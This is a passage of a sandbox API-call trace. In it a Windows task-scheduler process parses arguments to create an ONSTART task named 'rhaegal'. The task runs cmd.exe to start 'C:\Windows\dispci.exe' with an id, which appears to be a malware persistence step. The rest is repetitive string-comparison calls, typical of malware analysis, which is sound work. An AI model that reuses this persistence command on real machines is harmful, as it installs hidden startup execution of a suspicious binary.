_Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.889] lstrlenW (lpString="|sc|") returned 4 [0017.889] lstrlenW (lpString="|SC|") returned 4 [0017.889] StrStrIW (lpFirst="|sc|", lpSrch="|SC|") returned="|sc|" [0017.889] SetLastError (dwErrCode=0x0) [0017.889] SetLastError (dwErrCode=0x0) [0017.889] lstrlenW (lpString="ONSTART") returned 7 [0017.889] lstrlenW (lpString="-/") returned 2 [0017.889] StrChrIW (lpStart="-/", wMatch=0x4f) returned 0x0 [0017.889] SetLastError (dwErrCode=0x490) [0017.889] SetLastError (dwErrCode=0x490) [0017.889] SetLastError (dwErrCode=0x0) [0017.889] lstrlenW (lpString="ONSTART") returned 7 [0017.889] StrChrIW (lpStart="ONSTART", wMatch=0x3a) returned 0x0 [0017.889] SetLastError (dwErrCode=0x490) [0017.889] SetLastError (dwErrCode=0x0) [0017.889] _memicmp (_Buf1=0x5b4ea8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.889] lstrlenW (lpString="ONSTART") returned 7 [0017.889] lstrlenW (lpString="ONSTART") returned 7 [0017.889] lstrlenW (lpString=" \x09") returned 2 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0017.889] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0017.889] GetLastError () returned 0x0 [0017.889] lstrlenW (lpString="ONSTART") returned 7 [0017.889] lstrlenW (lpString="ONSTART") returned 7 [0017.889] SetLastError (dwErrCode=0x0) [0017.889] SetLastError (dwErrCode=0x0) [0017.889] lstrlenW (lpString="/TN") returned 3 [0017.889] lstrlenW (lpString="-/") returned 2 [0017.889] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.889] lstrlenW (lpString="create") returned 6 [0017.889] lstrlenW (lpString="create") returned 6 [0017.889] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.889] lstrlenW (lpString="TN") returned 2 [0017.889] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.889] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|create|") returned 8 [0017.890] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.890] lstrlenW (lpString="|create|") returned 8 [0017.890] lstrlenW (lpString="|TN|") returned 4 [0017.890] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0017.890] SetLastError (dwErrCode=0x490) [0017.890] lstrlenW (lpString="?") returned 1 [0017.890] lstrlenW (lpString="?") returned 1 [0017.890] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] lstrlenW (lpString="TN") returned 2 [0017.890] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|?|") returned 3 [0017.890] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.890] lstrlenW (lpString="|?|") returned 3 [0017.890] lstrlenW (lpString="|TN|") returned 4 [0017.890] SetLastError (dwErrCode=0x490) [0017.890] lstrlenW (lpString="s") returned 1 [0017.890] lstrlenW (lpString="s") returned 1 [0017.890] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] lstrlenW (lpString="TN") returned 2 [0017.890] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|s|") returned 3 [0017.890] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.890] lstrlenW (lpString="|s|") returned 3 [0017.890] lstrlenW (lpString="|TN|") returned 4 [0017.890] SetLastError (dwErrCode=0x490) [0017.890] lstrlenW (lpString="u") returned 1 [0017.890] lstrlenW (lpString="u") returned 1 [0017.890] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] lstrlenW (lpString="TN") returned 2 [0017.890] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|u|") returned 3 [0017.890] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.890] lstrlenW (lpString="|u|") returned 3 [0017.890] lstrlenW (lpString="|TN|") returned 4 [0017.890] SetLastError (dwErrCode=0x490) [0017.890] lstrlenW (lpString="p") returned 1 [0017.890] lstrlenW (lpString="p") returned 1 [0017.890] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] lstrlenW (lpString="TN") returned 2 [0017.890] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|p|") returned 3 [0017.890] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.890] lstrlenW (lpString="|p|") returned 3 [0017.890] lstrlenW (lpString="|TN|") returned 4 [0017.890] SetLastError (dwErrCode=0x490) [0017.890] lstrlenW (lpString="ru") returned 2 [0017.890] lstrlenW (lpString="ru") returned 2 [0017.890] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] lstrlenW (lpString="TN") returned 2 [0017.890] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.890] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|ru|") returned 4 [0017.890] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.890] lstrlenW (lpString="|ru|") returned 4 [0017.890] lstrlenW (lpString="|TN|") returned 4 [0017.890] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0 [0017.891] SetLastError (dwErrCode=0x490) [0017.891] lstrlenW (lpString="rp") returned 2 [0017.891] lstrlenW (lpString="rp") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] lstrlenW (lpString="TN") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|rp|") returned 4 [0017.891] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.891] lstrlenW (lpString="|rp|") returned 4 [0017.891] lstrlenW (lpString="|TN|") returned 4 [0017.891] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0 [0017.891] SetLastError (dwErrCode=0x490) [0017.891] lstrlenW (lpString="sc") returned 2 [0017.891] lstrlenW (lpString="sc") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] lstrlenW (lpString="TN") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|sc|") returned 4 [0017.891] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.891] lstrlenW (lpString="|sc|") returned 4 [0017.891] lstrlenW (lpString="|TN|") returned 4 [0017.891] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0 [0017.891] SetLastError (dwErrCode=0x490) [0017.891] lstrlenW (lpString="mo") returned 2 [0017.891] lstrlenW (lpString="mo") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] lstrlenW (lpString="TN") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|mo|") returned 4 [0017.891] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.891] lstrlenW (lpString="|mo|") returned 4 [0017.891] lstrlenW (lpString="|TN|") returned 4 [0017.891] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0 [0017.891] SetLastError (dwErrCode=0x490) [0017.891] lstrlenW (lpString="d") returned 1 [0017.891] lstrlenW (lpString="d") returned 1 [0017.891] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] lstrlenW (lpString="TN") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|d|") returned 3 [0017.891] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.891] lstrlenW (lpString="|d|") returned 3 [0017.891] lstrlenW (lpString="|TN|") returned 4 [0017.891] SetLastError (dwErrCode=0x490) [0017.891] lstrlenW (lpString="m") returned 1 [0017.891] lstrlenW (lpString="m") returned 1 [0017.891] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] lstrlenW (lpString="TN") returned 2 [0017.891] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.891] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|m|") returned 3 [0017.891] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.891] lstrlenW (lpString="|m|") returned 3 [0017.891] lstrlenW (lpString="|TN|") returned 4 [0017.892] SetLastError (dwErrCode=0x490) [0017.892] lstrlenW (lpString="i") returned 1 [0017.892] lstrlenW (lpString="i") returned 1 [0017.892] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.892] lstrlenW (lpString="TN") returned 2 [0017.892] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.892] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|i|") returned 3 [0017.892] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.892] lstrlenW (lpString="|i|") returned 3 [0017.892] lstrlenW (lpString="|TN|") returned 4 [0017.892] SetLastError (dwErrCode=0x490) [0017.892] lstrlenW (lpString="tn") returned 2 [0017.892] lstrlenW (lpString="tn") returned 2 [0017.892] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.892] lstrlenW (lpString="TN") returned 2 [0017.892] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.892] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|tn|") returned 4 [0017.892] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TN|") returned 4 [0017.892] lstrlenW (lpString="|tn|") returned 4 [0017.892] lstrlenW (lpString="|TN|") returned 4 [0017.892] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0017.892] SetLastError (dwErrCode=0x0) [0017.892] SetLastError (dwErrCode=0x0) [0017.892] lstrlenW (lpString="rhaegal") returned 7 [0017.892] lstrlenW (lpString="-/") returned 2 [0017.892] StrChrIW (lpStart="-/", wMatch=0x72) returned 0x0 [0017.892] SetLastError (dwErrCode=0x490) [0017.892] SetLastError (dwErrCode=0x490) [0017.892] SetLastError (dwErrCode=0x0) [0017.892] lstrlenW (lpString="rhaegal") returned 7 [0017.892] StrChrIW (lpStart="rhaegal", wMatch=0x3a) returned 0x0 [0017.892] SetLastError (dwErrCode=0x490) [0017.892] SetLastError (dwErrCode=0x0) [0017.892] lstrlenW (lpString="rhaegal") returned 7 [0017.892] SetLastError (dwErrCode=0x0) [0017.892] SetLastError (dwErrCode=0x0) [0017.892] lstrlenW (lpString="/TR") returned 3 [0017.892] lstrlenW (lpString="-/") returned 2 [0017.892] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.892] lstrlenW (lpString="create") returned 6 [0017.892] lstrlenW (lpString="create") returned 6 [0017.892] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] lstrlenW (lpString="TR") returned 2 [0017.903] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|create|") returned 8 [0017.903] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.903] lstrlenW (lpString="|create|") returned 8 [0017.903] lstrlenW (lpString="|TR|") returned 4 [0017.903] StrStrIW (lpFirst="|create|", lpSrch="|TR|") returned 0x0 [0017.903] SetLastError (dwErrCode=0x490) [0017.903] lstrlenW (lpString="?") returned 1 [0017.903] lstrlenW (lpString="?") returned 1 [0017.903] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] lstrlenW (lpString="TR") returned 2 [0017.903] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|?|") returned 3 [0017.903] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.903] lstrlenW (lpString="|?|") returned 3 [0017.903] lstrlenW (lpString="|TR|") returned 4 [0017.903] SetLastError (dwErrCode=0x490) [0017.903] lstrlenW (lpString="s") returned 1 [0017.903] lstrlenW (lpString="s") returned 1 [0017.903] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] lstrlenW (lpString="TR") returned 2 [0017.903] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|s|") returned 3 [0017.903] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.903] lstrlenW (lpString="|s|") returned 3 [0017.903] lstrlenW (lpString="|TR|") returned 4 [0017.903] SetLastError (dwErrCode=0x490) [0017.903] lstrlenW (lpString="u") returned 1 [0017.903] lstrlenW (lpString="u") returned 1 [0017.903] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] lstrlenW (lpString="TR") returned 2 [0017.903] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.903] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|u|") returned 3 [0017.903] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.903] lstrlenW (lpString="|u|") returned 3 [0017.904] lstrlenW (lpString="|TR|") returned 4 [0017.904] SetLastError (dwErrCode=0x490) [0017.904] lstrlenW (lpString="p") returned 1 [0017.904] lstrlenW (lpString="p") returned 1 [0017.904] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] lstrlenW (lpString="TR") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|p|") returned 3 [0017.904] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.904] lstrlenW (lpString="|p|") returned 3 [0017.904] lstrlenW (lpString="|TR|") returned 4 [0017.904] SetLastError (dwErrCode=0x490) [0017.904] lstrlenW (lpString="ru") returned 2 [0017.904] lstrlenW (lpString="ru") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] lstrlenW (lpString="TR") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|ru|") returned 4 [0017.904] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.904] lstrlenW (lpString="|ru|") returned 4 [0017.904] lstrlenW (lpString="|TR|") returned 4 [0017.904] StrStrIW (lpFirst="|ru|", lpSrch="|TR|") returned 0x0 [0017.904] SetLastError (dwErrCode=0x490) [0017.904] lstrlenW (lpString="rp") returned 2 [0017.904] lstrlenW (lpString="rp") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] lstrlenW (lpString="TR") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|rp|") returned 4 [0017.904] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.904] lstrlenW (lpString="|rp|") returned 4 [0017.904] lstrlenW (lpString="|TR|") returned 4 [0017.904] StrStrIW (lpFirst="|rp|", lpSrch="|TR|") returned 0x0 [0017.904] SetLastError (dwErrCode=0x490) [0017.904] lstrlenW (lpString="sc") returned 2 [0017.904] lstrlenW (lpString="sc") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] lstrlenW (lpString="TR") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|sc|") returned 4 [0017.904] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.904] lstrlenW (lpString="|sc|") returned 4 [0017.904] lstrlenW (lpString="|TR|") returned 4 [0017.904] StrStrIW (lpFirst="|sc|", lpSrch="|TR|") returned 0x0 [0017.904] SetLastError (dwErrCode=0x490) [0017.904] lstrlenW (lpString="mo") returned 2 [0017.904] lstrlenW (lpString="mo") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] lstrlenW (lpString="TR") returned 2 [0017.904] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.904] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|mo|") returned 4 [0017.905] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.905] lstrlenW (lpString="|mo|") returned 4 [0017.905] lstrlenW (lpString="|TR|") returned 4 [0017.905] StrStrIW (lpFirst="|mo|", lpSrch="|TR|") returned 0x0 [0017.905] SetLastError (dwErrCode=0x490) [0017.905] lstrlenW (lpString="d") returned 1 [0017.905] lstrlenW (lpString="d") returned 1 [0017.905] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] lstrlenW (lpString="TR") returned 2 [0017.905] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|d|") returned 3 [0017.905] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.905] lstrlenW (lpString="|d|") returned 3 [0017.905] lstrlenW (lpString="|TR|") returned 4 [0017.905] SetLastError (dwErrCode=0x490) [0017.905] lstrlenW (lpString="m") returned 1 [0017.905] lstrlenW (lpString="m") returned 1 [0017.905] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] lstrlenW (lpString="TR") returned 2 [0017.905] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|m|") returned 3 [0017.905] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.905] lstrlenW (lpString="|m|") returned 3 [0017.905] lstrlenW (lpString="|TR|") returned 4 [0017.905] SetLastError (dwErrCode=0x490) [0017.905] lstrlenW (lpString="i") returned 1 [0017.905] lstrlenW (lpString="i") returned 1 [0017.905] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] lstrlenW (lpString="TR") returned 2 [0017.905] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|i|") returned 3 [0017.905] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.905] lstrlenW (lpString="|i|") returned 3 [0017.905] lstrlenW (lpString="|TR|") returned 4 [0017.905] SetLastError (dwErrCode=0x490) [0017.905] lstrlenW (lpString="tn") returned 2 [0017.905] lstrlenW (lpString="tn") returned 2 [0017.905] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] lstrlenW (lpString="TR") returned 2 [0017.905] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|tn|") returned 4 [0017.905] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.905] lstrlenW (lpString="|tn|") returned 4 [0017.905] lstrlenW (lpString="|TR|") returned 4 [0017.905] StrStrIW (lpFirst="|tn|", lpSrch="|TR|") returned 0x0 [0017.905] SetLastError (dwErrCode=0x490) [0017.905] lstrlenW (lpString="tr") returned 2 [0017.905] lstrlenW (lpString="tr") returned 2 [0017.905] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] lstrlenW (lpString="TR") returned 2 [0017.905] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.905] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|tr|") returned 4 [0017.906] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|TR|") returned 4 [0017.906] lstrlenW (lpString="|tr|") returned 4 [0017.906] lstrlenW (lpString="|TR|") returned 4 [0017.906] StrStrIW (lpFirst="|tr|", lpSrch="|TR|") returned="|tr|" [0017.906] SetLastError (dwErrCode=0x0) [0017.906] SetLastError (dwErrCode=0x0) [0017.906] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.906] lstrlenW (lpString="-/") returned 2 [0017.906] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0017.906] SetLastError (dwErrCode=0x490) [0017.906] SetLastError (dwErrCode=0x490) [0017.906] SetLastError (dwErrCode=0x0) [0017.906] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.906] StrChrIW (lpStart="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit", wMatch=0x3a) returned=":\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit" [0017.906] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.906] _memicmp (_Buf1=0x5b4ec0, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.906] _memicmp (_Buf1=0x5b4ef0, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.906] SetLastError (dwErrCode=0x7a) [0017.906] SetLastError (dwErrCode=0x0) [0017.906] SetLastError (dwErrCode=0x0) [0017.906] lstrlenW (lpString="C") returned 1 [0017.906] SetLastError (dwErrCode=0x490) [0017.906] SetLastError (dwErrCode=0x0) [0017.906] _memicmp (_Buf1=0x5b4ea8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.906] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.906] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.906] lstrlenW (lpString=" \x09") returned 2 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0017.906] StrChrW (lpStart=" \x09", wMatch=0x79) returned 